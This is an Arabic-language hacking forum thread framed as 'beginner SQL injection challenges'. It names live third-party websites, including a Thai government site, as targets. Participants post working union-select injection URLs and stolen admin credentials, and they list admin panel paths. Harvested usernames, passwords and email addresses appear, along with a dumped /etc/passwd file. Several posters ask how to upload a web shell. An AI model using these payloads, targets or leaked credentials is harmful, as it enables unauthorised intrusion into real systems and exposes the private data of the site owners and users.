|
تحديات خاصة بالمبتدئين في دورة sql السلام عليكم لتدليل المصاعب امام المبتدئين , وتثمينا لمجهودات اخينا فولكانو , سأضع كل مرة موقعا مصابا ويحاول المبتدئون ايجاد معلوماته. الأجوبة ترسل على الخاص وسيم وضع لائحة باسماء المتفوقين . على بركة الله نبدأ الموقع الأول http://www.5landswalk.com.au مدة التحدي يومان لكم تحياتي |
والله مبادرة رائعة جدا منك يا مارك |
اقتباس:
لك تحياتي |
tnaks man , for this chalange |
لم أتوصل بأي جواب لكن الاخوة ما شاء الله عليهم دخلوا الموقع وتم ترقيع الخطأ sql . التحدي الثاني سهل http://www.hironakajima.com/ نقطة البداية http://www.hironakajima.com/business...php?mail_id=12 الثغرة sql الاصدار 5 المدة يومان لكم تحياتي |
البيانات اممم اليوزر stoneusa7 البااس stoned اماا لووحة ماطلعت معااي هع هع ننتظر الباقين |
اقتباس:
http://www.hironakajima.com/admin/login.php سأرفع موقعا آخر غدا بحول الله لك تحياتي |
السلام عليكم و رحمة الله تعالى و بركاته شكرا أخي الغالي على الفكرة الجميلة كنت محتاج لها و الله كود: II-اليوزرنام 1 الباس stoned ************ user اسم جدول اليوزر userpass اسم عمود لاباس user_id اسم عمود اليوزر اليوزرنام 1 الباس stoned ************* يعني اليوزر مستحيل و الباس صحيح جربت امر غروب و ليميت ما يشتغل معاي يعني قلت ربما اخطأت في الجدول لانه كما لاحضتم الجدول عندي اسمه user تلميذ كسول خخخ آسف اتمنى اشوف ردودكم اخوتي الكرام سلام |
هذا موقع ىخر جربت عليه و نفس المشكلة كود: http://accesscourses.net/fr/news_detail.php?id=-1 union select 1,2,3,concat(id,0x3a,pass),5,6+from+client--احاول استخدم أمر غروب ما ينفع يعني يعطيني نفس الجدول الي انا عملت عليه و ما يعطيني جداول أخرى اجرب عليها |
اقتباس:
بتظافر الجهود نتعلم جميعا ونرقى بمستوى المنتدى . |
بالنسبة للموقع الثاني اخي lifenote اليك المبتغى وجب اسعمال login بدل id لك تحياتي |
السلام عليكم الموقع التالي http://www.annapolisroyalwellnesscenterandspa.com الثغرة sql الاصدار 5 عدد الأعمدة 5 والمصاب رقم 2 لكم تحياتي |
الموقع ما يضهر لي عليه خطا أخي ^_^ ///////// انضر اخي هنا كود: http://accesscourses.net/fr/news_detail.php?id=-1%20union%20select%201,concat%28login,0x3a,pass%29,3,4,5,6+from+client--و حتى برنامج AdminPage |
اقتباس:
انتظرنى راح اجيب راسه n028 BL4CK TIG3R |
جوابك صحيح اخي الكريم the cold zero. وفقك الله لما يحب ويرضى الجواب admin:admin لوحة التحكم http://www.annapolisroyalwellnesscen...dmin/login.php لكم تحياتي |
اقتباس:
انتبه جيدا للدروس عوض concat اكتب group_cancat وتنحل المشكلة لك تحياتي |
|
اول شي اشكرك اخي على الموضوع الرائع الله يجازيك الف خير ثانيا تم اخراج اليوزر والباس اليوزر: delider الباسوورد: stormfury وهذا لوحة التحكم http://www.amaigabeko.com/admin/login.html وشكرا |
اقتباس:
تسلم يا بطل وفى انتظار الموقع القادم.. |
السلام عليكم اليكم الموقع التالي http://www.flhsbaseballreport.com/ الثغرة sql الاصدار 5 المرجو وضع رابط الاستغلال كاملا . لكم تحياتي |
السلام عليكم تم اخراج اليوزر والباس بس بصراحة مامتاكد منه لان مافي امتيازات الادمن ؟؟؟؟ ياريت لو تشوفونة والان رابط الاستغلال http://www.flhsbaseballreport.com/pl...rom+s_contacts رابط لوحة التحكم http://www.flhsbaseballreport.com/coachadmin/login.php اليوزر: herreraa@dadeschools.net الباس : cougars لاكن نريد طرق لرفع الشيل ياريت لو تعلمونة طريقة رفع الشل وشكرا |
اقتباس:
هل تأكدت من صحة المعلومات لك تحياتي |
اخي في الموقع مكانين لدخول الادمن هذا واحد منهم http://www.flhsbaseballreport.com/coachadmin/login.php وجربته عليه ودخل بس الثاني مايدخل وهذا الثاني http://www.flhsbaseballreport.com/directory/login.php في صفحة اسمه directory طلعت الاعمدة المصابة وهذا هوه الرابط http://www.flhsbaseballreport.com/di...select+1,2,3-- لاكن union+select عند استعمال يظهر خطا وجربت ببرنامج havij ييقول انو هذه الصفحة اصدار قاعدة البيانات 4 لاكن ماطلع الاعمدة هل من الممكن ان يكون في موقع واحد اصدارين بس الاول الله شاهد انا طلعته بدون برنامج يعني يدوي والثاني لان ماطلع يدوي استعملت البرنامج لاكن بدون فائدة |
انتظرنى راح اجيب لك الاستغلال كامل |
Sql helper بيقول URL is not vulnerable شوف سكريبت اخر و الله أعلم |
|
اقتباس:
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ smilies9 |
اقتباس:
Andy Barkett bubbadog info@baseballpros.net sissyfig millennium sissyfig59@aol.com igolf234 right1 arobinson5678@aol.com mcisme06 dramaomg6 mcisme06@aol.com goldglove2b ttrryy justin@probaseballtips.com LockeJET ALEXANDER CHAD.WEISSMAN@AGRIFLORA.COM |
|
تم اخراج اليوزر والباس رابط الدخول http://www.uidjournal.com/admin/ اليوزر : [gdwl]ryan@gozipline.com[/gdwl] الباسوورد : [gdwl]password[/gdwl] [warning] <ياريت لو ترفعولي شل على الموقع > [/warning] |
احسنت اخي الكريم في المرة القادمة , تفضل بوضع رابط الاستغلال كاملا لك تحياتي |
السلام عليكم بما ان بعض الاخوة يتفاعلون مع هذه التمارين , اليكم الموقع التالي http://www.opdc.go.th الاصدار 5 لكم تحياتي |
تمااارين قاااسيه هع هع بس نبي نرفع شل عليهااا مدري كيف الطريقه |
اخي ممكن سوأل كيف الاستفاده من هذه [warning]root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin eodi:x:1000:1000:eodi,,,:/home/eodi:/bin/bash ting:x:1001:1001:ting eodi,,,:/home/ting:/bin/bash mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false adminopdc:x:1002:1002:adminopdc,,,:/home/adminopdc:/bin/bash proftpd:x:106:65534::/var/run/proftpd:/bin/false ftp:x:107:65534::/home/ftp:/bin/false opdcmoi:x:1017:100:opdcmoi:/data/www/www.opdc.go.th/moi:/bin/sh goodpractice:x:1014:100:goodpractice:/data/www/www.opdc.go.th/goodpracticemodel:/bin/sh websiteopdc:x:1012:100:websiteopdc:/data/www/www.opdc.go.th:/bin/sh gcs:x:1010:100:gcs:/data/www/www.opdc.go.th/gcs:/bin/sh tkhpo:x:1009:100:tkhpo:/data/www/www.opdc.go.th/tkhpo:/bin/sh km:x:1008:100:km:/data/www/km.opdc.go.th:/bin/sh webmaster:x:1007:100:webmaster:/data/www/www.opdc.go.th:/bin/sh incentives50:x:1000:100:incentives50:/data/www/www.opdc.go.th/incentives50:/bin/sh munin:x:108:115::/var/lib/munin:/bin/false clamav:x:109:116::/var/lib/clamav:/bin/false postfix:x:110:118::/var/spool/postfix:/bin/false test:x:1003:100:test,test,,:/home/test:/bin/bash moiftp:x:1005:100:moiftp,,,:/data/www/moi.opdc.go.th:/bin/sh tkhpoftp:x:1006:100:tkhpoftp,,,:/data/www/tkhpo.opdc.go.th:/bin/sh gcsftp:x:1004:100:gcsftp,,,:/data/www/gcs.opdc.go.th/:/bin/sh incentives:x:1011:100:incentives,,,:/data/www/incentives.opdc.go.th:/bin/sh osmftp:x:1013:100:osm,,,:/data/www/osm.opdc.go.th:/bin/sh [/warning] |
اقتباس:
في انتظار احد العناكب لك تحياتي |
اقتباس:
لك تحياتي |
أخ مارااك أخي في كثير من المواقع لما بتريد أن تحقنها ما بتظهر الأعمة ممكن تقول ايش العمل ؟؟؟ |
اقتباس:
تفضل بوضع مثال لأشرح لك الطريقة ان كان فعلا الموقع قابلا للحقن |
اقتباس:
لكن أنا لما فحصته وجدت فيه الخطأ و استخرجت المجال اللي محصور فيه الأعمدة المصابة لكن لما أطبق أمر انيو+سيلكت + عدد الأعمدة ( 1,,2,3,4........) ما يطلعو الجداول المصابه ايش العمل في هذه الحالة ؟؟ |
هذا هوه الاستغلال الكامل للموقع http://www.opdc.go.th/english/main/c...cs.admin--+%27 واليوزر : admin والباس : admin وهذا مسار لوحة التحكم http://www.opdc.go.th/english/admin ياريت الي يكدر يرفع شل ويضع الرابط هنا لتدريب عليه لا غير smilies14 |
| الساعة الآن 09:46 AM |
[ vBspiders.Com Network ]